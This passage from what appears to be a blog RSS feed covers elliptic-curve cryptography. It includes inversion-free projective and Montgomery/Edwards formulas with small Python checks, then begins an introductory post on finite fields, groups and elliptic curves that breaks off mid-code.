If we want to sum $P$ and $Q$ to yield $R = P + Q$ in projective space, we can use the formulae:&lt;&#x2F;p&gt;
&lt;p&gt;$Z_R = Z_PZ_Q(X_PZ_Q-X_QZ_P)^3$&lt;br &#x2F;&gt;
$X_R = (X_PZ_Q-X_QZ_P)(Z_QZ_P(Y_PZ_Q-Y_QZ_P)^2 - (X_PZ_Q-X_QZ_P)^2(X_PZ_Q+X_QZ_P))$&lt;br &#x2F;&gt;
$Y_R = Z_PZ_Q(X_QY_P-X_PY_Q)(X_PZ_Q-X_QZ_P)^2 - (Y_PZ_Q-Y_QZ_P)A$&lt;br &#x2F;&gt;
$A = Z_PZ_Q(Y_PZ_Q-Y_QZ_P)^2 - (X_PZ_Q+X_QZ_P)(X_PZ_Q-X_QZ_P)^2$.&lt;&#x2F;p&gt;
&lt;p&gt;These formulae look more complicated than the simple ones for 2-d space. However, we do not have to calculate any inverses! To compute the sum, we perform 12 multiplications and 2 squarings. In 2-d, we have 2 multiplications, one squaring and one inversion. Inversions can be 20 times or more expensive than multiplications (some authors estimate they are about 80 times more expensive), so we save at least 10 multiplications per addition.&lt;&#x2F;p&gt;
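&lt;p&gt;As a quick sanity check, the projective addition can be verified numerically. The following sketch (the toy curve $y^2 = x^3 + 2x + 3$ over $\mathbb{F}_{97}$ and all names are our own choices, not from the original post) compares the inversion-free formulas against the affine chord rule:&lt;&#x2F;p&gt;

```python
# A sketch (our own toy curve, not from the post): check that the
# inversion-free projective addition matches the affine chord rule
# on y^2 = x^3 + 2x + 3 over F_97.
p, a, b = 97, 2, 3

# collect the affine points of the curve by brute force
points = [(x, y) for x in range(p) for y in range(p)
          if (y * y - (x**3 + a * x + b)) % p == 0]

def affine_add(P, Q):
    """Chord rule for points with distinct x: one inversion per addition."""
    (x1, y1), (x2, y2) = P, Q
    s = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (s * s - x1 - x2) % p
    return (x3, (s * (x1 - x3) - y1) % p)

def projective_add(P, Q):
    """The projective formulas: multiplications and squarings only."""
    XP, YP, ZP = P
    XQ, YQ, ZQ = Q
    u = (YP * ZQ - YQ * ZP) % p                    # numerator of the slope
    v = (XP * ZQ - XQ * ZP) % p                    # denominator of the slope
    A = (ZP * ZQ * u * u - (XP * ZQ + XQ * ZP) * v * v) % p
    return v * A % p, (ZP * ZQ * (XQ * YP - XP * YQ) * v * v - u * A) % p, ZP * ZQ * v**3 % p

P = points[0]
Q = next(pt for pt in points if pt[0] != P[0])
X, Y, Z = projective_add((P[0], P[1], 1), (Q[0], Q[1], 1))
Zinv = pow(Z, -1, p)      # the single inversion, deferred to the very end
assert (X * Zinv % p, Y * Zinv % p) == affine_add(P, Q)
```

&lt;p&gt;Note how the single inversion only happens at the end, when we return to affine coordinates.&lt;&#x2F;p&gt;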
&lt;p&gt;Some curves can go even faster. If $x^3 + ax + b$ has a root in $\mathbb{F}_p$, we can work with an equivalent Jacobi quartic $v^2 = a^\prime u^4 + du^2 + 1$, where $a^\prime$ and $d$ depend on the root. We can transform the curve $(u,v)$ to 3-d space $(U,V,W)$ using $u = U&#x2F;W$ and $v = V &#x2F; W^2$ and get the equation&lt;&#x2F;p&gt;
&lt;p&gt;$$V^2 = a^\prime U^4 + dU^2 W^2 + W^4$$&lt;&#x2F;p&gt;
&lt;p&gt;If we want to sum $P_3 = P_1+P_2$, in these coordinates we have:&lt;&#x2F;p&gt;
&lt;p&gt;$U_3 = U_1W_1V_2 + U_2W_2V_1$&lt;br &#x2F;&gt;
$V_3 = ((W_1 W_2)^2 + a^\prime (U_1 U_2)^2)(V_1 V_2 + dU_1 U_2 W_1 W_2) + 2a^\prime U_1 U_2 W_1 W_2 ({U_1}^2 {W_2}^2 + {U_2}^2 {W_1}^2)$&lt;br &#x2F;&gt;
$W_3 = (W_1 W_2)^2 - a^\prime (U_1 U_2)^2$&lt;&#x2F;p&gt;
&lt;p&gt;These allow us to further reduce the cost of addition to 6 multiplications and 4 squarings. Other models, such as Edwards curves and Montgomery curves, admit some of the fastest known implementations.&lt;&#x2F;p&gt;
&lt;p&gt;Montgomery curves satisfy the following equation&lt;br &#x2F;&gt;
$$By^2 = x^3 + Ax^2 + x$$&lt;br &#x2F;&gt;
where $B(A^2-4)\neq 0$. This expression can be cast in Weierstrass form by a change of variables. If we take $(x,y)$ and map it to $(x^\prime , y^\prime)$ given by $(x,y) \rightarrow (x&#x2F;B+A&#x2F;3B,y&#x2F;B)$, we get&lt;br &#x2F;&gt;
$$y^2 = x^3 + \left(\frac{3 - A^2}{ 3B^2 }\right)x + \frac{2A^3 - 9A}{27B^3}$$&lt;br &#x2F;&gt;
Transforming a Weierstrass curve into a Montgomery curve is not always possible, though: the order of the group must be divisible by $4$, and $x^3 + ax + b = 0$ must have a root in the field.&lt;&#x2F;p&gt;
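&lt;p&gt;To make the transformation concrete, here is a small numerical check (the prime $p=101$ and the parameters $A=6$, $B=1$ are our own toy choices, not values from the post): every point of the Montgomery curve, once mapped, satisfies the Weierstrass equation above.&lt;&#x2F;p&gt;

```python
# A sketch with toy parameters (our own): map the points of the Montgomery
# curve B*y^2 = x^3 + A*x^2 + x over F_101 with (x, y) -> (x/B + A/(3B), y/B)
# and confirm they land on the Weierstrass curve given by the text.
p, A, B = 101, 6, 1
assert B * (A * A - 4) % p != 0          # required Montgomery condition

inv3B = pow(3 * B, -1, p)
invB = pow(B, -1, p)
aw = (3 - A * A) * pow(3 * B * B, -1, p) % p          # (3 - A^2) / (3B^2)
bw = (2 * A**3 - 9 * A) * pow(27 * B**3, -1, p) % p   # (2A^3 - 9A) / (27B^3)

for x in range(p):
    for y in range(p):
        if (B * y * y - (x**3 + A * x * x + x)) % p == 0:
            X = (x * invB + A * inv3B) % p            # x/B + A/(3B)
            Y = y * invB % p                          # y/B
            assert (Y * Y - (X**3 + aw * X + bw)) % p == 0
```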
&lt;p&gt;Montgomery curves can also be related to twisted Edwards curves, which obey the following equation&lt;br &#x2F;&gt;
$$ax^2 + y^2 = 1+dx^2 y^2$$&lt;br &#x2F;&gt;
The parameters are related via $A=2(a+d)&#x2F;(a-d)$ and $B=4&#x2F;(a-d)$. We say these two curves are birationally equivalent. For example, the well-known curve edwards25519, with $p = 2^{255}-19$, is birationally equivalent to the Montgomery curve Curve25519, $t^2 = u^3 + 486662u^2 + u$. The mappings are&lt;br &#x2F;&gt;
$(x,y) = (\sqrt{-486664}u&#x2F;t,(u-1)&#x2F;(u+1))$&lt;br &#x2F;&gt;
$(u,t) = ((1+y)&#x2F;(1-y),\sqrt{-486664}(1+y)&#x2F;(x(1-y)))$&lt;&#x2F;p&gt;
&lt;p&gt;Montgomery curves have some interesting properties that lend themselves to constant-time implementations. We can work in projective coordinates using only the $x$ component, with the transformation $x=X&#x2F;Z$. Doubling a point takes the simple form:&lt;br &#x2F;&gt;
$R = 4X_1Z_1 = (X_1+Z_1)^2 - (X_1-Z_1)^2$&lt;br &#x2F;&gt;
$X_2 = (X_1+Z_1)^2 (X_1-Z_1)^2$&lt;br &#x2F;&gt;
$Z_2 = R((X_1-Z_1)^2 + ((A+2)&#x2F;4)R)$&lt;&#x2F;p&gt;
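&lt;p&gt;A quick numerical check of these $x$-only doubling formulas (the parameters $A=6$, $B=1$ over $\mathbb{F}_{101}$ are our own toy choice; real implementations use curves like Curve25519):&lt;&#x2F;p&gt;

```python
# A sketch with toy parameters (our own): x-only Montgomery doubling,
# checked against the affine tangent rule on B*y^2 = x^3 + A*x^2 + x.
p, A, B = 101, 6, 1
a24 = (A + 2) * pow(4, -1, p) % p        # the (A+2)/4 constant

def x_double(X1, Z1):
    """Inversion-free doubling on the x-line: X2/Z2 = x(2P)."""
    t1 = (X1 + Z1) ** 2 % p
    t2 = (X1 - Z1) ** 2 % p
    R = (t1 - t2) % p                    # R = 4*X1*Z1
    return t1 * t2 % p, R * (t2 + a24 * R) % p

def affine_double_x(x, y):
    """Affine doubling via the tangent slope; costs one inversion."""
    s = (3 * x * x + 2 * A * x + 1) * pow(2 * B * y, -1, p) % p
    return (B * s * s - A - 2 * x) % p

# brute-force a point with y != 0
x, y = next((x, y) for x in range(p) for y in range(1, p)
            if (B * y * y - (x**3 + A * x * x + x)) % p == 0)
X2, Z2 = x_double(x, 1)
assert X2 * pow(Z2, -1, p) % p == affine_double_x(x, y)
```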
&lt;p&gt;Twisted Edwards curves have their advantages, too. The expressions for point addition and doubling are the same. Given $P_1 = (x_1 , y_1)$, $P_2 = (x_2,y_2)$ we get&lt;br &#x2F;&gt;
$x_3 = \frac{x_1y_2 + x_2y_1}{1 + dx_1x_2y_1y_2}$&lt;br &#x2F;&gt;
$y_3 = \frac{y_1y_2 - ax_1x_2}{1 - dx_1x_2y_1y_2}$&lt;br &#x2F;&gt;
If we let $x_1 = x_2$ and $y_1 = y_2$, we get the expressions for point doubling. There are several alternatives for speeding up the calculations, such as projective, inverted or extended coordinates.&lt;&#x2F;p&gt;
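&lt;p&gt;The unified addition law can be sketched as follows (the parameters $a=4$, $d=2$ over $\mathbb{F}_{101}$ are our own choice, with $a$ a square and $d$ a non-square so that the denominators never vanish):&lt;&#x2F;p&gt;

```python
# A sketch on a toy twisted Edwards curve a*x^2 + y^2 = 1 + d*x^2*y^2
# (parameters are ours, not from the post). The same formula performs
# both addition and doubling, which helps constant-time code.
p, a, d = 101, 4, 2

def ed_add(P, Q):
    x1, y1 = P
    x2, y2 = Q
    t = d * x1 * x2 * y1 * y2 % p
    x3 = (x1 * y2 + x2 * y1) * pow(1 + t, -1, p) % p
    y3 = (y1 * y2 - a * x1 * x2) * pow(1 - t, -1, p) % p
    return x3, y3

def on_curve(P):
    x, y = P
    return (a * x * x + y * y - 1 - d * x * x * y * y) % p == 0

pts = [(x, y) for x in range(p) for y in range(p) if on_curve((x, y))]
P = next(pt for pt in pts if pt[0] != 0)
assert on_curve(ed_add(P, P))        # doubling: same formula with x1 = x2
assert ed_add(P, (0, 1)) == P        # (0, 1) is the identity element
```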
&lt;p&gt;There are some other tricks to add and multiply points over elliptic curves, such as the technique by Gallant, Lambert and Vanstone (GLV), later generalized by Galbraith, Lin and Scott (GLS).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;Elliptic curves have gained acceptance in cryptography because they offer good levels of security with short key lengths and allow for faster implementations than other methods such as RSA. This allows smartphones and other less powerful devices to perform cryptographic operations in a fast and reliable way.&lt;&#x2F;p&gt;
&lt;p&gt;Using the chord-and-tangent method, we can generate finite cyclic groups; in applications, we are generally interested in calculating $kg$, where $k$ is an integer and $g$ is a point on the elliptic curve. The main drawback is that we need to find multiplicative inverses of field elements, which cost many multiplications each.&lt;&#x2F;p&gt;
&lt;p&gt;We can improve the speed of these computations by performing transformations between curves (for example, taking a Weierstrass curve to Montgomery form) and using projective coordinates. This way, we avoid calculating multiplicative inverses at each step, at the expense of a few extra multiplications (this extra cost is usually negligible compared with the cost of the inversions we avoid). There are also more advanced techniques allowing us to jump from one point to a very distant one, such as GLV and GLS.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>What every developer needs to know about elliptic curves</title>
          <pubDate>Sat, 06 Aug 2022 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/what-every-developer-needs-to-know-about-elliptic-curves/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/what-every-developer-needs-to-know-about-elliptic-curves/</guid>
&lt;description xml:base=&quot;https:&#x2F;&#x2F;lambdaclass.github.io&#x2F;lambdaclass_blog&#x2F;posts&#x2F;what-every-developer-needs-to-know-about-elliptic-curves&#x2F;&quot;&gt;&lt;p&gt;Elliptic curves (EC) have become one of the most useful tools for modern cryptography. They were proposed in the 1980s and became widely used after 2004. Their main advantage is that they offer smaller key sizes to attain the same level of security as other methods, resulting in smaller storage and transmission requirements. For example, EC cryptography (ECC) needs 256-bit keys to attain the same level of security as a 3000-bit key using RSA (another public-key cryptographic system, born in the late 70s). ECC and RSA work by hiding things inside a certain mathematical structure known as a finite cyclic group (we will explain this soon). The hiding is done rather in plain sight: you could break the system if you could reverse the math trick (spoiler alert: if done properly, it would take you several lifetimes). It is as if you put $1,000,000 inside an unbreakable glass box: anyone could take it if they could break the box.&lt;&#x2F;p&gt;
&lt;p&gt;In order to understand these objects and why they work, we need to go backstage and look at the math principles (we won’t enter into the hard details or proofs, but rather focus on the concepts or ideas). We will start by explaining finite fields and groups and then jump onto the elliptic curves (over finite fields) and see whether all curves were created equal for crypto purposes.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;finite-fields&quot;&gt;Finite fields&lt;&#x2F;h2&gt;
&lt;p&gt;We know examples of fields from elementary math. The rational, real and complex numbers with the usual notions of sum and multiplication are examples of fields (these are not finite though).&lt;&#x2F;p&gt;
&lt;p&gt;A finite field is a set equipped with two operations, which we will call + and ×. These operations need to have certain properties in order for this to be a field:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;If &lt;em&gt;a&lt;&#x2F;em&gt; and &lt;em&gt;b&lt;&#x2F;em&gt; are in the set, then &lt;em&gt;c=a+b&lt;&#x2F;em&gt; and &lt;em&gt;d=a×b&lt;&#x2F;em&gt; should also be in the set. This is what is mathematically called a closed set under the operations +, ×.&lt;&#x2F;li&gt;
&lt;li&gt;There is a zero element, 0, such that &lt;em&gt;a&lt;&#x2F;em&gt; +0=&lt;em&gt;a&lt;&#x2F;em&gt; for any a in the set. This element is called the additive identity.&lt;&#x2F;li&gt;
&lt;li&gt;There is an element, 1, such that 1× &lt;em&gt;a&lt;&#x2F;em&gt; =&lt;em&gt;a&lt;&#x2F;em&gt; for any a in the set. This element is the multiplicative identity.&lt;&#x2F;li&gt;
&lt;li&gt;If a is in the set, there is an element &lt;em&gt;b&lt;&#x2F;em&gt; , such that &lt;em&gt;a+b&lt;&#x2F;em&gt; =0. We call this element the additive inverse and we usually write it as &lt;em&gt;−a&lt;&#x2F;em&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;If &lt;em&gt;a&lt;&#x2F;em&gt; is in the set, there is an element &lt;em&gt;c&lt;&#x2F;em&gt; such that &lt;em&gt;a×c=1&lt;&#x2F;em&gt;. This element is called the multiplicative inverse and we write it as &lt;em&gt;a&lt;&#x2F;em&gt;⁻¹.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;Before we can talk about examples of finite fields, we need to introduce the modulo arithmetic.&lt;&#x2F;p&gt;
&lt;p&gt;We learned that given a natural number or zero, &lt;em&gt;a&lt;&#x2F;em&gt;, and a non-zero number &lt;em&gt;b&lt;&#x2F;em&gt;, we can write &lt;em&gt;a&lt;&#x2F;em&gt; as &lt;em&gt;a=q×b+r&lt;&#x2F;em&gt;, where &lt;em&gt;q&lt;&#x2F;em&gt; is the quotient and &lt;em&gt;r&lt;&#x2F;em&gt; is the remainder of the division &lt;em&gt;a&#x2F;b&lt;&#x2F;em&gt;. This &lt;em&gt;r&lt;&#x2F;em&gt; can take the values 0,1,2,…,b−1. We know that if &lt;em&gt;r&lt;&#x2F;em&gt; is zero, then &lt;em&gt;a&lt;&#x2F;em&gt; is a multiple of &lt;em&gt;b&lt;&#x2F;em&gt;. It may not seem new, but this gives us a very useful tool to work with numbers. For example, if &lt;em&gt;b&lt;&#x2F;em&gt;=2 then &lt;em&gt;r&lt;&#x2F;em&gt;=0,1. When it is 0, &lt;em&gt;a&lt;&#x2F;em&gt; is even (it is divisible by 2) and when it is 1, &lt;em&gt;a&lt;&#x2F;em&gt; is odd. A simple way to rephrase this (due to Gauss):&lt;&#x2F;p&gt;
&lt;p&gt;a≡1(mod2)&lt;&#x2F;p&gt;
&lt;p&gt;if &lt;em&gt;a&lt;&#x2F;em&gt; is odd and&lt;&#x2F;p&gt;
&lt;p&gt;a≡0(mod2)&lt;&#x2F;p&gt;
&lt;p&gt;if &lt;em&gt;a&lt;&#x2F;em&gt; is even. We can see that if we sum two odd numbers &lt;em&gt;a1&lt;&#x2F;em&gt; and &lt;em&gt;a2&lt;&#x2F;em&gt; ,&lt;&#x2F;p&gt;
&lt;p&gt;a1+a2≡1+1≡0(mod2)&lt;&#x2F;p&gt;
&lt;p&gt;This shows us that, if we want to know whether a sum is even or not, we can simply sum the remainders of their division by 2 (an application of this is that in order to check divisibility by two, we should only look at the last bit of the binary representation).&lt;&#x2F;p&gt;
&lt;p&gt;Another situation where this arises every day is with time. If we are on Monday at 10 am and we have 36 hours till the deadline of a project, we have to submit everything by Tuesday 10 pm. That is because 12 fits exactly 3 times in 36, leading to Mon-10 pm, Tue-10 am, Tue-10 pm. If we had 39 hours, we jump to Wed-1 am.&lt;&#x2F;p&gt;
&lt;p&gt;An easy way to look at this relation (formally known as congruence modulo p) is that if &lt;em&gt;a≡b&lt;&#x2F;em&gt;(mod &lt;em&gt;p&lt;&#x2F;em&gt;), then &lt;em&gt;p&lt;&#x2F;em&gt; divides &lt;em&gt;a−b&lt;&#x2F;em&gt; , or &lt;em&gt;a=k×p+b&lt;&#x2F;em&gt; for an integer &lt;em&gt;k&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;More informally, we see that operating (mod &lt;em&gt;p&lt;&#x2F;em&gt;) wraps the results of our calculations around, always giving numbers between 0 and &lt;em&gt;p&lt;&#x2F;em&gt;−1.&lt;&#x2F;p&gt;
&lt;p&gt;We can see that if a1≡b1 (mod &lt;em&gt;p&lt;&#x2F;em&gt;) and a2≡b2 (mod &lt;em&gt;p&lt;&#x2F;em&gt;), then a1+a2≡b1+b2 (mod &lt;em&gt;p&lt;&#x2F;em&gt;) (if b1+b2&amp;gt;p we can wrap the result around). Similar results apply for subtraction and multiplication. Division presents some difficulties, but we can change things a little bit and make it work this way: instead of dividing &lt;em&gt;a÷b&lt;&#x2F;em&gt;, we calculate &lt;em&gt;a×b&lt;&#x2F;em&gt;⁻¹, where &lt;em&gt;b&lt;&#x2F;em&gt;⁻¹ is the multiplicative inverse of &lt;em&gt;b&lt;&#x2F;em&gt; (remember &lt;em&gt;b×b&lt;&#x2F;em&gt;⁻¹=1). Consider &lt;em&gt;p&lt;&#x2F;em&gt;=5, so the elements of the field are 0,1,2,3,4.&lt;&#x2F;p&gt;
&lt;p&gt;We can see that 1 is its own multiplicative inverse, since 1×1=1≡1 (mod 5). If we take 2 and 3, then 2×3=6≡1 (mod 5), so 3 is the multiplicative inverse of 2, and 4×4=16≡1 (mod 5), so 4 is its own inverse. The set and the operations defined satisfy the conditions for a field.&lt;&#x2F;p&gt;
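&lt;p&gt;We can check this small table of inverses with a few lines of Python, using the built-in three-argument &lt;code&gt;pow&lt;&#x2F;code&gt;, which since Python 3.8 also computes modular inverses:&lt;&#x2F;p&gt;

```python
# Reproducing the inverses in F_5 worked out above with Python's
# built-in modular inverse (pow with exponent -1).
p = 5
inverses = {b: pow(b, -1, p) for b in range(1, p)}
assert inverses == {1: 1, 2: 3, 3: 2, 4: 4}

# "division" a / b in the field is multiplication by the inverse:
assert 3 * pow(2, -1, p) % p == 4    # 3 / 2 = 3 * 3 = 9 ≡ 4 (mod 5)
```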
&lt;p&gt;We can also define integer powers of field elements in a simple way. If we want to square a number &lt;em&gt;a&lt;&#x2F;em&gt;, we just compute &lt;em&gt;a×a&lt;&#x2F;em&gt; and take mod &lt;em&gt;p&lt;&#x2F;em&gt;. If we want a cube, we do &lt;em&gt;a×a×a&lt;&#x2F;em&gt; and take mod &lt;em&gt;p&lt;&#x2F;em&gt;. RSA uses exponentiation to perform encryption. It is easy to see that if the exponent is rather large (or the base is very large, or both), numbers get really big. For example, suppose we want to evaluate $2^{65536} \pmod{p}$. When the exponent reaches 1000, we already get numbers with over 300 digits, and we still have a long way to go. We can do this calculation much more simply by realizing that $65536=2^{16}$ and repeatedly squaring the number, taking the remainder every time. We end up doing only 16 operations like this instead of the original 65536, thus avoiding huge numbers. A similar strategy will be used when we work with ECs!&lt;&#x2F;p&gt;
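&lt;p&gt;The repeated-squaring trick looks like this in Python (the modulus below is an arbitrary choice of ours for the demo):&lt;&#x2F;p&gt;

```python
# A sketch of the repeated-squaring idea: since 65536 = 2^16, sixteen
# squarings (reducing mod p each time) compute 2^65536 mod p without
# ever forming the astronomically large intermediate number.
p = 1_000_003          # an arbitrary prime modulus for the demo

acc = 2
for _ in range(16):    # 65536 = 2**16, so 16 squarings suffice
    acc = acc * acc % p

assert acc == pow(2, 65536, p)   # matches Python's built-in modular power
```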
&lt;h2 id=&quot;groups&quot;&gt;Groups&lt;&#x2F;h2&gt;
&lt;p&gt;We saw that whenever we add two even integers, we get another even integer. Besides, 0 is even, and if we sum &lt;em&gt;a&lt;&#x2F;em&gt; and &lt;em&gt;−a&lt;&#x2F;em&gt; we get 0, which is the identity element for the sum. Many different objects behave similarly when equipped with a certain operation. For example, the multiplication of two invertible matrices results in an invertible matrix. If we consider the set of invertible &lt;em&gt;N&lt;&#x2F;em&gt;×&lt;em&gt;N&lt;&#x2F;em&gt; matrices equipped with multiplication, we can see that if &lt;em&gt;A&lt;&#x2F;em&gt; is in the set, &lt;em&gt;A&lt;&#x2F;em&gt;⁻¹ is in the set; the identity matrix is in the set (and it plays the role of the identity element with respect to multiplication). In other words, some sets equipped with a certain operation share some properties, and we can take advantage of the knowledge of this structure. The set, together with the operation, forms a group. Formally, a group is a set &lt;em&gt;G&lt;&#x2F;em&gt; equipped with a binary operation × such that:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;The operation is associative, that is, &lt;em&gt;(a×b)×c=a×(b×c)&lt;&#x2F;em&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;There is an identity element &lt;em&gt;e&lt;&#x2F;em&gt;: &lt;em&gt;e×a=a&lt;&#x2F;em&gt; and &lt;em&gt;a×e=a&lt;&#x2F;em&gt;.&lt;&#x2F;li&gt;
&lt;li&gt;For every element &lt;em&gt;a&lt;&#x2F;em&gt; in the set, there is an element &lt;em&gt;b&lt;&#x2F;em&gt; in the set such that &lt;em&gt;a×b=e&lt;&#x2F;em&gt; and &lt;em&gt;b×a=e&lt;&#x2F;em&gt;. We denote &lt;em&gt;b=a&lt;&#x2F;em&gt;⁻¹ for simplicity.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;We can easily see that any field is, in particular, a group with respect to each one of its two operations (conditions 1, 2 and 4 for the field indicate it is also a group with respect to the sum and 1, 3 and 5 for multiplication). If the operation is commutative (that is, &lt;em&gt;a×b=b×a&lt;&#x2F;em&gt;) the group is known as an abelian (or commutative) group. For example, the invertible matrices of &lt;em&gt;N×N&lt;&#x2F;em&gt; form a group, but it is not abelian, since &lt;em&gt;A×B≠B×A&lt;&#x2F;em&gt; for some matrices &lt;em&gt;A&lt;&#x2F;em&gt; and &lt;em&gt;B&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;We will be interested in finite groups (those whose set contains a finite number of elements) and, in particular, cyclic groups. These are groups that can be generated by repeatedly applying the operation to an element &lt;em&gt;g&lt;&#x2F;em&gt;, the generator of the group. The &lt;em&gt;n&lt;&#x2F;em&gt;-th roots of unity in the complex numbers form an example of a cyclic group under multiplication; this is the set of solutions of $x^n=1$, which are of the form $\exp(2\pi ik&#x2F;n)$, with $k=0,1,2,…,n−1$. This group can be generated by taking integer powers of $\exp(2\pi i&#x2F;n)$. The roots of unity play an important role in the calculation of the fast Fourier transform (FFT), which has many applications.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;elliptic-curves-in-a-nutshell&quot;&gt;Elliptic curves in a nutshell&lt;&#x2F;h2&gt;
&lt;p&gt;Elliptic curves are very useful objects because they allow us to obtain a group structure with interesting properties. Given a field &lt;em&gt;F&lt;&#x2F;em&gt; , an elliptic curve is the set of points &lt;em&gt;(x,y)&lt;&#x2F;em&gt; which satisfy the following equation:&lt;&#x2F;p&gt;
&lt;p&gt;$$y^2+a_1xy+a_3y=x^3+a_2x^2+a_4x+a_6$$&lt;&#x2F;p&gt;
&lt;p&gt;This is known as the general Weierstrass equation. In many cases, this can be written in the simpler form&lt;&#x2F;p&gt;
&lt;p&gt;$$y^2=x^3+ax+b$$&lt;&#x2F;p&gt;
&lt;p&gt;which is the short (Weierstrass) form. Depending on the choice of the parameters &lt;em&gt;a&lt;&#x2F;em&gt; and &lt;em&gt;b&lt;&#x2F;em&gt; and the field, the curve may or may not have the desired properties. If $4a^3+27b^2\neq 0$, the curve is non-singular.&lt;&#x2F;p&gt;
&lt;p&gt;We can define an operation that allows us to sum elements belonging to the elliptic curve and obtain a group. This is done using a geometric construction, the chord-and-tangent rule. Given two points on the curve, $P_1=(x_1,y_1)$ and $P_2=(x_2,y_2)$, we can draw a line connecting them. That line intersects the curve at a third point $P_3=(x_3,y_3)$. We set the sum of $P_1$ and $P_2$ to be $(x_3,−y_3)$, that is, the point $P_3$ flipped around the &lt;em&gt;x&lt;&#x2F;em&gt;-axis. The formulae are:  &lt;img src=&quot;&#x2F;images&#x2F;2022&#x2F;12&#x2F;imagen-1.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;We can easily see that we have a problem if we try to sum $P_1=(x_1,y_1)$ and $P_2=(x_1,−y_1)$. We need to add an additional point to the system, which we call the point at infinity $\mathcal{O}$. This inclusion is necessary to define the group structure, and $\mathcal{O}$ works as the identity element for the group operation.&lt;&#x2F;p&gt;
&lt;p&gt;Another problem appears when we want to sum $P_1$ with itself to get $P_3=2P_1$, since the chord is no longer defined. Instead, we draw the tangent line to the curve at $P_1$ and see that it intersects the curve at another point. To perform this operation, we need to find the slope of the tangent line and then the intersection:&lt;&#x2F;p&gt;
&lt;p&gt;$$s=\frac{3x_1^2+a}{2y_1}$$&lt;br &#x2F;&gt;
$$x_3=s^2-2x_1$$&lt;br &#x2F;&gt;
$$y_3=s(x_1-x_3)-y_1$$&lt;&#x2F;p&gt;
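&lt;p&gt;These doubling formulas can be checked numerically. A minimal sketch over a small prime field (the toy curve $y^2=x^3+2x+3$ over $\mathbb{F}_{97}$ is our own choice, not from the post):&lt;&#x2F;p&gt;

```python
# Checking the tangent-rule doubling formulas on a toy curve
# y^2 = x^3 + 2x + 3 over F_97 (our own choice of parameters).
p, a, b = 97, 2, 3

def ec_double(P):
    """Tangent rule: s = (3x^2 + a) / (2y), valid for a point with y != 0."""
    x1, y1 = P
    s = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    x3 = (s * s - 2 * x1) % p
    y3 = (s * (x1 - x3) - y1) % p
    return (x3, y3)

def on_curve(P):
    x, y = P
    return (y * y - (x**3 + a * x + b)) % p == 0

# brute-force some point with y != 0, then check that 2P is on the curve
P = next((x, y) for x in range(p) for y in range(1, p) if on_curve((x, y)))
assert on_curve(ec_double(P))
```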
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;2022&#x2F;12&#x2F;imagen-5.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;It takes a little bit of work, but we can prove that the elliptic curve with this operation has the properties of a group. We will use finite fields to work with these curves, and the groups that we obtain are finite cyclic groups, that is, groups that can be generated by repeatedly applying the operation to a generator &lt;em&gt;g&lt;&#x2F;em&gt;: &lt;em&gt;g,2g,3g,4g,5g,….&lt;&#x2F;em&gt; &lt;img src=&quot;&#x2F;images&#x2F;2022&#x2F;12&#x2F;imagen-3.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;If we plot the collection of points onto a graph, we see that they are distributed in a rather “random” fashion. For example, &lt;em&gt;2g&lt;&#x2F;em&gt; could be very far from &lt;em&gt;3g&lt;&#x2F;em&gt;, which in turn is very far from &lt;em&gt;4g&lt;&#x2F;em&gt;. If we want to know how many times &lt;em&gt;k&lt;&#x2F;em&gt; we have to add the generator to arrive at a certain point &lt;em&gt;P&lt;&#x2F;em&gt; (that is, to solve the equation &lt;em&gt;kg=P&lt;&#x2F;em&gt;), we have no better strategy than a brute-force search over all possible &lt;em&gt;k&lt;&#x2F;em&gt;. This problem is known as the (elliptic curve) discrete logarithm (log for friends) problem (other friends prefer ECDLP).&lt;&#x2F;p&gt;
&lt;p&gt;On the other hand, if we know &lt;em&gt;k&lt;&#x2F;em&gt;, we can compute &lt;em&gt;P=kg&lt;&#x2F;em&gt; very fast. This offers us a way to hide (in plain sight) things inside the group. Of course, if you could break the DLP, you could get &lt;em&gt;k&lt;&#x2F;em&gt;, but that is rather infeasible. If we want to calculate &lt;em&gt;65536g&lt;&#x2F;em&gt;, we can do it by realizing that &lt;em&gt;g+g=2g&lt;&#x2F;em&gt;, &lt;em&gt;2g+2g=4g&lt;&#x2F;em&gt;, &lt;em&gt;4g+4g=8g&lt;&#x2F;em&gt;… until &lt;em&gt;32768g+32768g=65536g&lt;&#x2F;em&gt;, so we narrowed 65536 operations down to 16. There are many useful algorithms that speed up operations over elliptic curves, allowing us to avoid expensive calculations such as the inversions that appear when we compute the slope.&lt;&#x2F;p&gt;
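&lt;p&gt;The doubling strategy above is usually called double-and-add. A sketch on a toy curve of our own choosing (nowhere near cryptographic size):&lt;&#x2F;p&gt;

```python
# Double-and-add scalar multiplication on a toy curve y^2 = x^3 + 2x + 3
# over F_97 (our own example). None stands for the point at infinity O.
p, a, b = 97, 2, 3

def ec_add(P, Q):
    if P is None:
        return Q
    if Q is None:
        return P
    x1, y1 = P
    x2, y2 = Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None                                   # P + (-P) = O
    if P == Q:                                        # tangent rule
        s = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    else:                                             # chord rule
        s = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (s * s - x1 - x2) % p
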